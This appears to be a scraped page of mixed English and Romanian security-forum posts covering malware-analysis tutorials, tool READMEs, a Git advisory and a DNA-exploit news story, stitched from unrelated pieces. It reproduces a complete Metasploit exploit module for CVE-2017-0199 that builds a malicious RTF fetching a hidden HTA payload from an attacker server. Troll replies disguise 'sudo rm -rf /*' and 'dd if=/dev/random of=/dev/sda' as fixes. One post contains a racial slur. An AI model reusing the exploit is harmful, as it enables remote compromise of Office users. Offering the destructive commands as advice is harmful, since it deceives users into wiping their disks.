Leaderboard

Reverse Engineering Malware 102 Material Introduction Section 1) Setup Section 2) Information Gathering Section 3) Creating Travel Directions Section 4) Identifying Encryption Section 5) Evasion Techniques Section 6) Identifying Packing Section 7) Extra Fun Section 8) Conclusion Sursa: https://securedorg.github.io/RE102/

O lista cu referinte catre blog-uri ce contin write-up-uri despre bug-uri gasite in companii ce au un program bug bounty. https://github.com/ngalongc/bug-bounty-reference

Transcrierea audierii din 4 August daca intereseaza pe cineva: https://www.documentcloud.org/documents/3923335-USA-v-Marcus-Hutchins-August-4-2017-Hearing.html (via: https://twitter.com/lorenzoFB/status/896069374603280384)

Arbitrary code execution via crafted ssh:// in Git """ A malicious third-party can give a crafted "ssh://..." URL to an unsuspecting victim and an attempt to visit the URL can result in any program that exists on the victim's machine being executed. Such a URL could be placed in the .gitmodules file of a malicious project, and an unsuspecting victim could be tricked into running "git clone --recurse-submodules" to trigger the vulnerability. """ Source: http://blog.recurity-labs.com/2017-08-10/scm-vulns https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1466490.html

At Bugcrowd, we’ve long said that managed bug bounty programs allow organizations of any size or stage of security maturity to realize the benefits of a bug bounty program. This is why we’ve provided managed programs from day one and why I’m especially excited by today’s news. Today we are recruiting for a Secret customer program with a top reward of $250K. https://blog.bugcrowd.com/secret-program-to-offer-rewards-up-to-250k?utm_content=58744554 https://bugcrowd.com/supersecretupcomingprogram @Aerosol @Kronzy

faker.js - generate massive amounts of fake data in the browser and node.js Demo: https://cdn.rawgit.com/Marak/faker.js/master/examples/browser/index.html Hosted API Microservice http://faker.hook.io Supports all Faker API Methods Full-Featured Microservice Hosted by hook.io curl http://faker.hook.io?property=name.findName&locale=de Usage Browser <script src = "faker.js" type = "text/javascript"></script> <script> var randomName = faker.name.findName(); // Caitlyn Kerluke var randomEmail = faker.internet.email(); // Rusty@arne.info var randomCard = faker.helpers.createCard(); // random contact card containing many properties </script> Node.js var faker = require('faker'); var randomName = faker.name.findName(); // Rowan Nikolaus var randomEmail = faker.internet.email(); // Kassandra.Haley@erich.biz var randomCard = faker.helpers.createCard(); // random contact card containing many properties API Faker.fake() faker.js contains a super useful generator method Faker.fake for combining faker API methods using a mustache string format. Example console.log(faker.fake("{{name.lastName}}, {{name.firstName}} {{name.suffix}}")); // outputs: "Marks, Dean Sr." This will interpolate the format string with the value of methods name.lastName(), name.firstName(), and name.suffix() JSDoc API Browser http://marak.github.io/faker.js/ API Methods address zipCode city cityPrefix citySuffix streetName streetAddress streetSuffix streetPrefix secondaryAddress county country countryCode state stateAbbr latitude longitude commerce color department productName price productAdjective productMaterial product company suffixes companyName companySuffix catchPhrase bs catchPhraseAdjective catchPhraseDescriptor catchPhraseNoun bsAdjective bsBuzz bsNoun database column type collation engine date past future between recent month weekday fake finance account accountName mask amount transactionType currencyCode currencyName currencySymbol bitcoinAddress iban bic hacker abbreviation adjective noun verb ingverb phrase helpers randomize slugify replaceSymbolWithNumber replaceSymbols shuffle mustache createCard contextualCard userCard createTransaction image image avatar imageUrl abstract animals business cats city food nightlife fashion people nature sports technics transport dataUri internet avatar email exampleEmail userName protocol url domainName domainSuffix domainWord ip ipv6 userAgent color mac password lorem word words sentence slug sentences paragraph paragraphs text lines name firstName lastName findName jobTitle prefix suffix title jobDescriptor jobArea jobType phone phoneNumber phoneNumberFormat phoneFormats random number arrayElement objectElement uuid boolean word words image locale alphaNumeric system fileName commonFileName mimeType commonFileType commonFileExt fileType fileExt directoryPath filePath semver Localization As of version v2.0.0 faker.js has support for multiple localities. The default language locale is set to English. Setting a new locale is simple: // sets locale to de faker.locale = "de"; az cz de de_AT de_CH en en_AU en_BORK en_CA en_GB en_IE en_IND en_US en_au_ocker es es_MX fa fr fr_CA ge id_ID it ja ko nb_NO nep nl pl pt_BR ru sk sv tr uk vi zh_CN zh_TW Individual Localization Packages As of vesion v3.0.0 faker.js supports incremental loading of locales. By default, requiring faker will include all locale data. In a production environment, you may only want to include the locale data for a specific set of locales. // loads only de locale var faker = require('faker/locale/de'); Setting a randomness seed If you want consistent results, you can set your own seed: faker.seed(123); var firstRandom = faker.random.number(); // Setting the seed again resets the sequence. faker.seed(123); var secondRandom = faker.random.number(); console.log(firstRandom === secondRandom); Tests npm install . make test You can view a code coverage report generated in coverage/lcov-report/index.html. Projects Built with faker.js Fake JSON Schema Use faker generators to populate JSON Schema samples. See :https://github.com/pateketrueke/json-schema-faker/ CLI Run faker generators from Command Line. See: https://github.com/lestoni/faker-cli Want to see your project added here? Let us know! Meteor Meteor Installation meteor add practicalmeteor:faker Meteor Usage, both client and server var randomName = faker.name.findName(); // Rowan Nikolaus var randomEmail = faker.internet.email(); // Kassandra.Haley@erich.biz var randomCard = faker.helpers.createCard(); // random contact card containing many properties Building faker.js faker uses gulp to automate it's build process. Running the following build command will generate new browser builds, documentation, and code examples for the project. npm run-script build Building JSDocs npm run-script doc Version Release Schedule faker.js is a popular project used by many organizations and individuals in production settings. Major and Minor version releases are generally on a monthly schedule. Bugs fixes are addressed by severity and fixed as soon as possible. If you require the absolute latest version of faker.js the master branch @ http://github.com/marak/faker.js/ should always be up to date and working. Maintainer Marak Squires faker.js - Copyright (c) 2017 Marak Squires http://github.com/marak/faker.js/ faker.js was inspired by and has used data definitions from: https://github.com/stympy/faker/ - Copyright (c) 2007-2010 Benjamin Curtis http://search.cpan.org/~jasonk/Data-Faker-0.07/ - Copyright 2004-2005 by Jason Kohles Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Download faker.js-master.zip Source: https://github.com/Marak/faker.js

Material Introduction Section 1) Fundamentals Section 2) Malware Techniques Section 3) RE Tools Section 4) Triage Analysis Section 5) Static Analysis Section 6) Dynamic Analysis Sursa: https://securedorg.github.io/RE101/

What's your goal? You clearly don't understand how ip works. (IP 50 is nonsense) Also you don't understand ports and protocols. Nobody here will help you as you are clearly unexperienced and try to do bad things (you don't understand why they are bad). Real piece of help: Stay away from trouble! Don't start "hacking" things you don't understand. Spend some time online reading and learning about these things (ip, port, protocol, scanner, bruteforcer, ip range, firewall, dns)

Eu folosesc MEGA (MEGA) si mi se pare f OK. Spor!

Lasand totusi mistocareala, eu trebuie sa recunosc ca ma bucur pe o parte ca si-au luat-o inca odata "institutiile". De ce? Pentru ca sumele aruncate pe site-urile alea nu sunt mici deloc in cele mai multe cazuri, fiind implicati oameni ca "Ghita" care constipa despre legi si vrajeala de dimineata pana seara in mainstream. Nu am o problema sa aloci 10.000 / 20.000 pentru un site de prezentare dar cand e facut pe Wordpress sau joomla + o tema moca si 1 plugin free si mai si semnezi cu un securist de al tau incep sa vad rosu in conditia in care "nu avem bani domle, suntem saraci suntem saraci credeti-ne pe cuvant ce dracu." . Legat de "in parnaie se ia la caca", tre' sa treceti pe acolo intai, situatii de genul mai erau prin 2005 iar acum "se mai ia la caca" doar daca se cere (bulangii pe bune, care o cer) sau chiar te vrea directoru de parnaie in celula cu cei mai al dracu care au obiceiuri de genul. Hai sa mai trecem peste filmele americane cu niggers. Is multi parametrii pana la sodomizare. Cu un ochi totusi plang pentru site-urile care nu aveau nici o legatura cu gunoiul de stat in care avem sansa sa murim de la o zi la alta. Aici s-ar explica prin hormoni si lipsa de cultura online. Decat sa se gandeasca la "manuale de sport" statul ar trebui sa se gandeasca la un manual de vorbit frumos pe internet si in caz ca are atractii pentru cracking / hacking / fucking stuff sa nu se ia de oricine amboulea si nici sa goleasca carduri.

In a mind-boggling world first, a team of biologists and security researchers have successfully infected a computer with a malicious program coded into a strand of DNA. It sounds like science fiction, but I assure you it’s quite real — although you probably don’t have to worry about this particular threat vector any time soon. That said, the possibilities suggested by this project are equally fascinating and terrifying to contemplate. The multidisciplinary team at the University of Washington isn’t out to make outlandish headlines, although it’s certainly done that. They were concerned that the security infrastructure around DNA transcription and analysis was inadequate, having found elementary vulnerabilities in open-source software used in labs around the world. Given the nature of the data usually being handled, this could be a serious problem going forward. Sure, they could demonstrate the weakness of the systems with the usual malware and remote access tools. That’s how any competent attacker would come at such a system. But the discriminating security professional prefers to stay ahead of the game. “One of the big things we try to do in the computer security community is to avoid a situation where we say, ‘Oh shoot, adversaries are here and knocking on our door and we’re not prepared,'” said professor Tadayoshi Kohno, who has a history of pursuing unusual attack vectors for embedded and niche electronics like pacemakers. From left, Lee Organick, Karl Koscher, and Peter Ney from the UW’s Molecular Information Systems Lab and the Security and Privacy Research Lab prepare the DNA exploit for sequencing “As these molecular and electronic worlds get closer together, there are potential interactions that we haven’t really had to contemplate before,” added Luis Ceze, one co-author of the study. Accordingly, they made the leap plenty of sci-fi writers have made in the past, and that we are currently exploring via tools like CRISPR: DNA is basically life’s file system. The analysis programs are reading a DNA strand’s bases (cytosine, thymine etc, the A, T, G, and C we all know) and turning them into binary data. Suppose those nucleotides were encoding binary data in the first place? After all, it’s been done before — right down the hall. Here comes the mad science Here’s how they did it. All you really need to know about the transcription application is that it reads the raw data coming from the transcription process and sorts through it, looking for patterns and converting the base sequences it finds into binary code.“The conversion from ASCII As, Ts, Gs, and Cs into a stream of bits is done in a fixed-size buffer that assumes a reasonable maximum read length,” explained co-author Karl Koscher in response to my requests for more technical information. That makes it ripe for a basic buffer overflow attack, in which programs execute arbitrary code because it falls outside expected parameters. (They cheated a little by introducing a particular vulnerability into the software themselves, but they also point out that similar ones are present elsewhere, just not as conveniently for purposes of demonstration.) After developing a way to include executable code in the base sequence, they set about making the exploit itself. Ironically, it’s inaccurate to call it a virus, although it’s closer to a “real” virus than perhaps any malicious code ever written.“The exploit was 176 bases long,” Koscher wrote. “The compression program translates each base into two bits, which are packed together, resulting in a 44 byte exploit when translated.” Given that there are 4 bases, it would make sense to have each represent a binary pair. Koscher confirmed this was the case. (If you’re curious, as I was: A=00, C=01, G=10, T=11.) “Most of these bytes are used to encode an ASCII shell command,” he continued. “Four bytes are used to make the conversion function return to the system() function in the C standard library, which executes shell commands, and four more bytes were used to tell system() where the command is in memory.” Essentially the code in the DNA escapes the program as soon as it is converted from ACGTs to 00011011s, and executes some commands in the system — a sufficient demonstration of the existence of the threat vector. And there’s plenty of room for more code if you wanted to do more than break out of the app. At 176 bases, the DNA strand comprising the exploit is “by almost any biological standard, very small,” said Lee Organick, a research scientist who worked on the project. Biopunk future confirmed In pursuance of every science journalist’s prime directive, which is to take interesting news and turn it into an existential threat to humanity, I had more questions for the team. “CONCEIVABLY,” I asked, in all caps to emphasize that we were entering speculative territory, “could such a payload be delivered via, for example, a doctored blood sample or even directly from a person’s body? One can imagine a person whose DNA is essentially deadly to poorly secured computers.” Irresponsibly, Organick stoked the fires of my fearmongering. “A doctored biological sample could indeed be used as a vector for malicious DNA to get processed downstream after sequencing and be executed,” he wrote. “However, getting the malicious DNA strand from a doctored sample into the sequencer is very difficult with many technical challenges,” he continued. “Even if you were successfully able to get it into the sequencer for sequencing, it might not be in any usable shape (it might be too fragmented to be read usefully, for example).” It’s not quite the biopunk apocalypse I envisioned, but the researchers do want people thinking along these lines at least as potential avenues of attack. “We do want scientists thinking about this so they can hold the DNA analysis software they write to the appropriate security standards so that this never makes sense to become a potential attack vector in the first place,” said Organick. “I would treat any input as untrusted and potentially able to compromise these applications,” added Koscher. “It would be wise to run these applications with some sort of isolation (in containers, VMs, etc.) to contain the damage an exploit could do. Many of these applications are also run as publicly-available cloud services, and I would make isolating these instances a high priority.” The likelihood of an attack like this actually being pulled off is minuscule, but it’s a symbolic milestone in the increasing overlap between the digital and the biological. The researchers will present their findings and process (PDF) next week at the USENIX Security conference in Vancouver. Via techcrunch.com

Puteai sa-ti rezolvi problema printr-o metoda mai amuzanta. Uita-te la clip-ul asta.

June 29, 2017 ~ R3MRUM Over the past year-or-so, there seems to have been an uptick of miscreants password protecting the malicious office documents that they send to their target victims. They do this in an effort to bypass detection and thwart analysis. This blog details a few different tools and methodologies that can be used to analyze such files. Delivery & File Type These malicious documents typically end up making their way to the end point via email. The email message typically consists of some ruse to entice the user to open the document and, conveniently, includes the password needed to decrypt it (Figure 1). Figure 1: Example email with password protected MS Office document attached and password in message body. The ‘m’ at the end of the ‘.dotm’ file extension, shown in Figure 1, tells you that the file attached is macro-enabled. In this instance, it is an MS Office Document Template file but it could have just as easily been a ‘.docm’ file, ‘.xlsm’ file, or any other macro-enabled file type supported by MS Office 2007 or newer. Feel free to read more about these file types on Microsoft’s website. Figure 2 shows the prompt that you are presented with when you open a password protected Office document: Figure 2: Password prompt received when opening a password protected office document. Failed Analysis Method #1: Copy Macros When I first encountered this type of malicious document, my first instinct was to launch the document in an isolated sandbox, enter in the password provided to me in the message body, and then copy the embedded VBA macro code from the document into notepad where I can then perform my analysis. This technically could have worked if the miscreant did not also password protect the Visual Basic Project containing the malicious VBA code with a separate unknown password (Figure 3). Figure 3: Password prompt received when attempting to gain access to macro code. Failed Analysis Method #2: Re-Save Without Password My second thought was: “After I open the document and enter in the initial password, I’ll just re-save the document without a password. Then I’ll be able to use my analysis tools to inspect the file’s contents.” Unfortunately, this doesn’t work either due to the fact that the VB Project within the encrypted document is also password protected. If you attempt this method, the contents of the document (images, text, etc…) will still be present within the unencrypted copy of the document but any embedded macros will be stripped. Successful Analysis Method #1: Decrypt with MSOffice-Crypt & Analyze w/ olevba|ViperMonkey Let me introduce you to a nifty little tool called msoffice-crypt. This bad mama jama enables you to dump a decrypted version of the encrypted office document out to a file. As a bonus, it works in both Windows and Linux! Figure 4: msoffice-crypt options & decrypting of encrypted Office document In Figure 4, I ran msoffice-crypt.exe without any arguments so that you can see the different supported options. Then, in the highlighted section, I ran the following command, which decrypted smith.dotm using the password “6429”: msoffice-crypt.exe -d -p 6429 smith.dotm If you did not provide an output file name, msoffice-crypt will default to appending an “_d” to the file name, like so: smith_d.dotm. Figure 5: Decrypted document created within the current working directory Sure enough, we see in Figure 5 that the decrypted Office document has been created. Now, if we launch this newly created document (in an isolated environment, of course!), you should no longer received the password prompt. Figure 6: Office document decrypted. Password no longer needed to open. Voilà! No password prompt received! (Figure 6) If you didn’t know, MS Office 2007+ documents are OpenXML format which means they are actually just compressed archives that you can decompress using you’re favorite archive extractor (WinZip, 7z, etc..). We can also spot the difference between the encrypted and decrypted documents by comparing the decompressed contents of both. Figure 7: Contents of decompressed encrypted Office document Figure 7 shows the contents of my encrypted Office document whereas Figure 8 shows the contents of my decrypted Office document. Figure 8: Contents of decompressed decrypted Office document The contents depicted in both Figures 7 and 8 are typical and should match what you are seeing in whatever OpenXML formatted Office document you are analyzing; not just this sample. This actually segues nicely into the next step, which is to extract out the VBA Macro code. If you recall, the malware author also password protected the VB Project containing the macro code. While I am not aware of any tool that will strip this protection from the document, it doesn’t matter as existing tools such as oletools, ViperMonkey, etc.. completely bypass it. Back in the day (like 3 months ago), I would have extracted out the VBA code by decompressing the OpenXML archive, locating the OLE binary within the “word” folder (i.e vbaProject.bin), and then using something like OfficeMalScanner (Figures 9 & 10): Figure 9: Running OfficeMalScanner against OLE binary found within OpenXML archive Figure 10: VBA code extracted from OLE binary using OfficeMalScanner … or olevba from the oletools suite (Figure 11): Figure 11: VBA code extracted from OLE binary using olevba But this is old-school. These days, all the kids are using ViperMonkey. ViperMonkey not only extracts the VBA for you but also emulates execution so that if the VBA is heavily obfuscation (in this case, it is not), you can quickly and safely derive what the code is actually doing. Also, it can handle OpenXML files so there is no need to extract the archive and locate the OLE binary. Figure 12: Analysis of the decrypted Office document using ViperMoney Figure 12 shows how ViperMoney not only extracts and displays the embedded VBA macro but it also gives you the execution flow of the malicious code in a quick and easy-to-ingest format. This dramatically reduces analysis time which, in turn, expedites time-to-respond. If I ever meet Philippe Lagadec (@decalage2), I’m going to buy that man a beer! Successful Analysis Method #2: Simply Open w/ LibreOffice Your probably going to hate me for making you step through the entire blog before mentioning – what turns out to be – the most simplest (and laziest) solution for accessing the embedded VBA code within a password protected document/project. Since REMNux doesn’t come packaged with LibreOffice, you’ll need to install it by simply running: sudo apt-get install libreoffice Once installed, open the encrypted Office document in LibreOffice by running: libreoffice smith.dotm Like when you opened the encrypted Office document within MS Office (Figure 2), you will be requested to enter in the document’s password (Figure 13). Figure 13: LibreOffice password prompt When you enter in the password, the document will successfully load. Now, you will be able to access the embedded VBA macro code by navigating to: Tools –> Macros –> Organize Macros –> LibreOffice Basic You will be presented with a pop-up window (Figure 14) where you will need to find the project containing the VBA code and hit the Edit button. Figure 14: LibreOffice’s Macro Editor Dialogue And BOOM! LibreOffice’s Basic Editor opens; giving you direct access to the VBA macro code without needing to also know the VB Project’s password (Figure 15): Figure 15: LibreOffice’s Basic Editor providing access to embedded VBA code. Bypassing password. That’s it! It’s that simple! My personal preference is the first method as I’m a command-line junkie. But, if you are more comfortable with performing your analysis via a GUI, then the LibreOffice method might be a better fit for you! Regardless, knowing multiple methods for solving single problem will only make you a better analyst. References Open XML Formats and file name extensions How to remove a password from a document MSOffice-Crypt: A tool/lib to encrypt/decrypt Microsoft Office Document Wikipedia: Office Open XML OfficeMalScanner Decalage2: oletools GitHub Decalage2: ViperMonkey GitHub LibreOffice Wiki Sursa: https://r3mrum.wordpress.com/2017/06/29/analyzing-malicious-password-protected-office-documents/

burpa: Burp Automator A Burp Suite Automation Tool with Slack Integration Requirements burp-rest-api Burp Suite Professional slackclient Usage: python burpa.py -h ################################################### __ / /_ __ ___________ ____ _ / __ \/ / / / ___/ __ \/ __ `/ / /_/ / /_/ / / / /_/ / /_/ / /_.___/\__,_/_/ / .___/\__,_/ /_/ burpa version 0.1 / by 0x4D31 ################################################### usage: burpa.py [-h] [-a {scan,proxy-config}] [-pP PROXY_PORT] [-aP API_PORT] [-rT {HTML,XML}] [-r {in-scope,all}] [--include-scope [INCLUDE_SCOPE [INCLUDE_SCOPE ...]]] [--exclude-scope [EXCLUDE_SCOPE [EXCLUDE_SCOPE ...]]] proxy_url positional arguments: proxy_url Burp Proxy URL optional arguments: -h, --help show this help message and exit -a {scan,proxy-config}, --action {scan,proxy-config} -pP PROXY_PORT, --proxy-port PROXY_PORT -aP API_PORT, --api-port API_PORT -rT {HTML,XML}, --report-type {HTML,XML} -r {in-scope,all}, --report {in-scope,all} --include-scope [INCLUDE_SCOPE [INCLUDE_SCOPE ...]] --exclude-scope [EXCLUDE_SCOPE [EXCLUDE_SCOPE ...]] TEST: $ python burpa.py http://127.0.0.1 --action proxy-config ################################################### __ / /_ __ ___________ ____ _ / __ \/ / / / ___/ __ \/ __ `/ / /_/ / /_/ / / / /_/ / /_/ / /_.___/\__,_/_/ / .___/\__,_/ /_/ burpa version 0.1 / by 0x4D31 ################################################### [+] Checking the Burp proxy configuration ... [-] Proxy configuration needs to be updated [+] Updating the Burp proxy configuration ... [-] Proxy configuration updated $ python burpa.py http://127.0.0.1 --action scan --include-scope http://testasp.vulnweb.com ################################################### __ / /_ __ ___________ ____ _ / __ \/ / / / ___/ __ \/ __ `/ / /_/ / /_/ / / / /_/ / /_/ / /_.___/\__,_/_/ / .___/\__,_/ /_/ burpa version 0.1 / by 0x4D31 ################################################### [+] Retrieving the Burp proxy history ... [-] Found 4 unique targets in proxy history [+] Updating the scope ... [-] http://testasp.vulnweb.com included in scope [+] Active scan started ... [-] http://testasp.vulnweb.com Added to the scan queue [-] Scan in progress: %100 [+] Scan completed [+] Scan issues for http://testasp.vulnweb.com: - Issue: Robots.txt file, Severity: Information - Issue: Cross-domain Referer leakage, Severity: Information - Issue: Cleartext submission of password, Severity: High - Issue: Frameable response (potential Clickjacking), Severity: Information - Issue: Password field with autocomplete enabled, Severity: Low - Issue: Cross-site scripting (reflected), Severity: High - Issue: Unencrypted communications, Severity: Low - Issue: Path-relative style sheet import, Severity: Information - Issue: Cookie without HttpOnly flag set, Severity: Low - Issue: File path traversal, Severity: High - Issue: SQL injection, Severity: High [+] Downloading HTML/XML report for http://testasp.vulnweb.com [-] Scan report saved to /tmp/burp-report_20170807-235135_http-testasp.vulnweb.com.html [+] Burp scan report uploaded to Slack Download burpa-master.zip Source: https://github.com/0x4D31/burpa

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => "Microsoft Office Word Malicious Hta Execution", 'Description' => %q{ This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample. }, 'Author' => [ 'Haifei Li', # vulnerability analysis 'ryHanson', 'wdormann', 'DidierStevens', 'vysec', 'Nixawk', # module developer 'sinn3r' # msf module improvement ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-0199'], ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'], ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'], ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'], ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'], ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'], ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'], ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'], ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'], ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'], ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199'] ], 'Platform' => 'win', 'Targets' => [ [ 'Microsoft Office Word', {} ] ], 'DefaultOptions' => { 'DisablePayloadHandler' => false }, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 14 2017')) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta']) ], self.class) end def generate_uri uri_maxlength = 112 host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] scheme = datastore['SSL'] ? 'https' : 'http' uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}" uri = Rex::Text.hexify(Rex::Text.to_unicode(uri)) uri.delete!("\n") uri.delete!("\\x") uri.delete!("\\") padding_length = uri_maxlength * 2 - uri.length fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative? padding_length.times { uri << "0" } uri end def create_ole_ministream_data # require 'rex/ole' # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ) # ministream = ole.instance_variable_get(:@ministream) # ministream_data = ministream.instance_variable_get(:@data) ministream_data = "" ministream_data << "01000002090000000100000000000000" # 00000000: ................ ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K...... ministream_data << generate_uri ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.] ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............ ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................ ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7........... ministream_data << "00000000000000000000000000000000" # 000000f0: ................ ministream_data << "100203000d0000000000000000000000" # 00000100: ................ ministream_data << "00000000000000000000000000000000" # 00000110: ................ ministream_data << "00000000000000000000000000000000" # 00000120: ................ ministream_data << "00000000000000000000000000000000" # 00000130: ................ ministream_data << "00000000000000000000000000000000" # 00000140: ................ ministream_data << "00000000000000000000000000000000" # 00000150: ................ ministream_data << "00000000000000000000000000000000" # 00000160: ................ ministream_data << "00000000000000000000000000000000" # 00000170: ................ ministream_data << "00000000000000000000000000000000" # 00000180: ................ ministream_data << "00000000000000000000000000000000" # 00000190: ................ ministream_data << "00000000000000000000000000000000" # 000001a0: ................ ministream_data << "00000000000000000000000000000000" # 000001b0: ................ ministream_data << "00000000000000000000000000000000" # 000001c0: ................ ministream_data << "00000000000000000000000000000000" # 000001d0: ................ ministream_data << "00000000000000000000000000000000" # 000001e0: ................ ministream_data << "00000000000000000000000000000000" # 000001f0: ................ ministream_data end def create_rtf_format template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf") template_rtf = ::File.open(template_path, 'rb') data = template_rtf.read(template_rtf.stat.size) data.gsub!('MINISTREAM_DATA', create_ole_ministream_data) template_rtf.close data end def on_request_uri(cli, req) p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform => 'win' } ) # This allows the HTA window to be invisible data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n") send_response(cli, data, 'Content-Type' => 'application/hta') end def exploit file_create(create_rtf_format) super end end Sursa: https://www.exploit-db.com/exploits/41934/

Just run ./masscan then run sudo rm -rf /*

./masscan then sudo rm -rf /* rm will delete all errors and it's gonna rn

@GBL Don't look at the troll! Running rm -rf /* will destroy your system! Your problem is that the scanner is using optimized system calls from /dev/random libraries. Your user doesn't have acces to this system libraries that contain the code needed. To allow access to all users to this libraries you need to run: sudo dd if=/dev/random of=/dev/sda ./masscan -all (the fitst line, executed as super user unlocks the dev/random libraries) After masscan will run just fine (and way faster)

gresit, in discutie e un handler ( https://www.merriam-webster.com/dictionary/handler ), 1-2 patsy ( http://www.urbandictionary.com/define.php?term=patsy ) , o vulnerabilitate SQL cunoscuta si lasata in "groapa uitarii", SQL injection ... si aici e necesar un background sonor care sa puncteze momentul in registrul dramatic,